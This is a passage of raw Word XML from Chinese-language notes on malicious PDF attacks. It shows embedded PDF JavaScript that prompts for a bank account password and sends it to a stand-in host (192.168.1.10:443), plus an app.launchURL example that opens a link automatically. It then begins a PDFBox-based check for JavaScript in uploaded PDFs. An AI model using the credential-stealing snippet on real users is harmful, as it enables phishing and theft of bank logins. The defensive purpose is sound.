          </w:p>
          <w:p w14:paraId="4B091C9A" w14:textId="77777777" w:rsidR="00762837" w:rsidRDefault="00762837" w:rsidP="00762837">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">var password = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>app.response</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">({ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>cQuestion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">:"Enter your Bank Account </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Passowrd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>cTitle</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">:"Bank Account Details", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>bPassword:true</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>cDefault</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>global.cLastPswd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>cLabel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>:"Password"});</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="379B0D4F" w14:textId="77777777" w:rsidR="00762837" w:rsidRDefault="00762837" w:rsidP="00762837">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">var </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>cURL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> = "http://192.168.1.10:443" + "?" + "account=" + account + "&amp;password=" + password;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="525A6B43" w14:textId="77777777" w:rsidR="00762837" w:rsidRDefault="00762837" w:rsidP="00762837">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>this.submitForm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>({</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>cURL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>encodeURI</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>cURL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>cSubmitAs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>: 'HTML'});</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71D1C1D4" w14:textId="77777777" w:rsidR="00762837" w:rsidRDefault="00762837" w:rsidP="00762837">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40C869FC" w14:textId="1705CFB7" w:rsidR="00762837" w:rsidRDefault="00762837" w:rsidP="00762837">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&gt;&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0744A602" w14:textId="77777777" w:rsidR="000D5DD3" w:rsidRPr="000D5DD3" w:rsidRDefault="000D5DD3" w:rsidP="000D5DD3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D5DD3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>打开恶意链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA382A8" w14:textId="13374F78" w:rsidR="000D5DD3" w:rsidRDefault="000D5DD3" w:rsidP="000D5DD3">
      <w:pPr>
        <w:ind w:firstLineChars="1100" w:firstLine="2420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击者可以将恶意链接嵌入 PDF 文件中，当受害者打开 PDF 文件时，会弹出安全警告信息；如果链接看起来合法，受害者可能会点击允许并打开恶意网站。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B2B176" w14:textId="24CE979D" w:rsidR="00870DD3" w:rsidRDefault="00552F5C" w:rsidP="000D5DD3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00552F5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00552F5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对象中的 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00552F5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>app.launchURL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00552F5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>() 函数</w:t>
      </w:r>
      <w:r w:rsidR="000D5DD3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法允许在打开 PDF 时启动链接，攻击者可以滥用此方法启动恶意链接。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ae"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8296"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA27DC" w14:paraId="123FE8DD" w14:textId="77777777" w:rsidTr="00AA27DC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17BF4066" w14:textId="77777777" w:rsidR="00B65669" w:rsidRDefault="00B65669" w:rsidP="00B65669">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;&lt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F163604" w14:textId="77777777" w:rsidR="00B65669" w:rsidRDefault="00B65669" w:rsidP="00B65669">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/Type /Action</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3222EA55" w14:textId="77777777" w:rsidR="00B65669" w:rsidRDefault="00B65669" w:rsidP="00B65669">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/S /JavaScript</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00847F2C" w14:textId="77777777" w:rsidR="00B65669" w:rsidRDefault="00B65669" w:rsidP="00B65669">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/JS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="760F689D" w14:textId="77777777" w:rsidR="00B65669" w:rsidRDefault="00B65669" w:rsidP="00B65669">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="482D40A1" w14:textId="77777777" w:rsidR="00B65669" w:rsidRDefault="00B65669" w:rsidP="00B65669">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>app.launchURL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>("https://twitter.com/0xCyberY", true);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B152D98" w14:textId="77777777" w:rsidR="00B65669" w:rsidRDefault="00B65669" w:rsidP="00B65669">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BF0DC4A" w14:textId="66A53883" w:rsidR="00AA27DC" w:rsidRDefault="00B65669" w:rsidP="00AA27DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&gt;&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="453B8001" w14:textId="7D17EFCA" w:rsidR="00870DD3" w:rsidRDefault="00C057DA" w:rsidP="0001351A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A52EAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PDF 嵌入</w:t>
      </w:r>
      <w:r w:rsidR="00A52EAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00A52EAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>可执行文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B776FF" w14:textId="3606CC20" w:rsidR="00727D02" w:rsidRDefault="00727D02" w:rsidP="00727D02">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00727D02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RCE攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7B8784" w14:textId="6F85D072" w:rsidR="001F7300" w:rsidRPr="001F7300" w:rsidRDefault="00E35473" w:rsidP="001F7300">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E35473">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2018-9958</w:t>
      </w:r>
      <w:r w:rsidR="002F5FDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r w:rsidR="002F5FDF" w:rsidRPr="002F5FDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>使用过时的 PDF 阅读器</w:t>
      </w:r>
      <w:r w:rsidR="002F5FDF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>才能触发，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>条件苛刻，仅了解即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF4F19E" w14:textId="006DF4B9" w:rsidR="00A52EAC" w:rsidRPr="004212AE" w:rsidRDefault="00066A2F" w:rsidP="004212AE">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004212AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>嵌入</w:t>
      </w:r>
      <w:r w:rsidR="007E50A5" w:rsidRPr="004212AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004212AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F0F35" w:rsidRPr="004212AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidRPr="004212AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196BF6A5" w14:textId="679498B7" w:rsidR="001A4952" w:rsidRDefault="001A4952" w:rsidP="004212AE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>防御方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FED614" w14:textId="47A0B5F5" w:rsidR="001A4952" w:rsidRDefault="00AD7755" w:rsidP="004212AE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>后端校验</w:t>
      </w:r>
      <w:r w:rsidR="00723F6D" w:rsidRPr="00723F6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>带有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00723F6D" w:rsidRPr="00723F6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00723F6D" w:rsidRPr="00723F6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>脚本的pdf文件</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ae"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8296"/>
      </w:tblGrid>
      <w:tr w:rsidR="003674C3" w14:paraId="40D76289" w14:textId="77777777" w:rsidTr="003674C3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B69A3E5" w14:textId="77777777" w:rsidR="003674C3" w:rsidRPr="003674C3" w:rsidRDefault="003674C3" w:rsidP="003674C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003674C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>&lt;dependency&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EC14E53" w14:textId="77777777" w:rsidR="003674C3" w:rsidRPr="003674C3" w:rsidRDefault="003674C3" w:rsidP="003674C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003674C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003674C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003674C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>groupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003674C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003674C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>org.apache.pdfbox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003674C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003674C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>groupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003674C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38E6A097" w14:textId="77777777" w:rsidR="003674C3" w:rsidRPr="003674C3" w:rsidRDefault="003674C3" w:rsidP="003674C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003674C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003674C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>artifactId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003674C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003674C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>pdfbox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003674C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003674C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>artifactId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003674C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02ABA3EA" w14:textId="77777777" w:rsidR="003674C3" w:rsidRPr="003674C3" w:rsidRDefault="003674C3" w:rsidP="003674C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003674C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            &lt;version&gt;2.0.26&lt;/version&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A3510EE" w14:textId="0DBC006F" w:rsidR="003674C3" w:rsidRDefault="003674C3" w:rsidP="003674C3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003674C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">        &lt;/dependency&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="278EEAD9" w14:textId="36DE6A92" w:rsidR="00870DD3" w:rsidRDefault="002D43BA" w:rsidP="003674C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D43BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测代码：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ae"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8296"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D3013F" w14:paraId="2859EB99" w14:textId="77777777" w:rsidTr="00D3013F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C6276F3" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/**</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="187A36CD" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">     * 校验pdf文件是否包含</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>js</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>脚本</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="239506F4" w14:textId="77777777" w:rsidR="00D3013F" w:rsidRDefault="00D3013F" w:rsidP="00D3013F">
            <w:pPr>
              <w:rPr>
